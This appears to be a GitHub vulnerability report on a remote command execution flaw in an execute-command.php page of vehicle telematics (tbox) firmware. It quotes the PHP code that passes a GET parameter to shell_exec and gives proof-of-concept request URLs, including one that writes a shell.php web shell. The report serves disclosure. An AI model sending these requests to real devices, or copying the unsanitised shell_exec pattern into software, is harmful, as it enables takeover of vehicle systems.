You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
/execute-command.php?command=echo "" > shell.php
To sum up, the device has a remote command execution vulnerability, which can be performed by injecting malicious code to obtain server permissions.
The text was updated successfully, but these errors were encountered:
The execute-command.php file exists in the \www\pages\matrix-gui-2.0 directory of the firmware
Vulnerability type: command execution
This source code is used for the tbox in the Internet of Vehicles, which can control the car's brain, so it is very dangerous
`<?php
$command = $_GET['command'];
$output = shell_exec($command);
echo $output;
?>
`
Through shell_ Exec carries out command execution, and the execution content is controlled by the command of get parameter transfer
Vulnerability exploitation process:
Pass the parameter command to the shell through get_ Exec for command execution and final output
POC:
/execute-command.php?command=ls
/execute-command.php?command=echo "" > shell.php
Example:
http://192.168.160.128:7777/execute-command.php?command=ls
/execute-command.php?command=echo "" > shell.php
To sum up, the device has a remote command execution vulnerability, which can be performed by injecting malicious code to obtain server permissions.
The text was updated successfully, but these errors were encountered: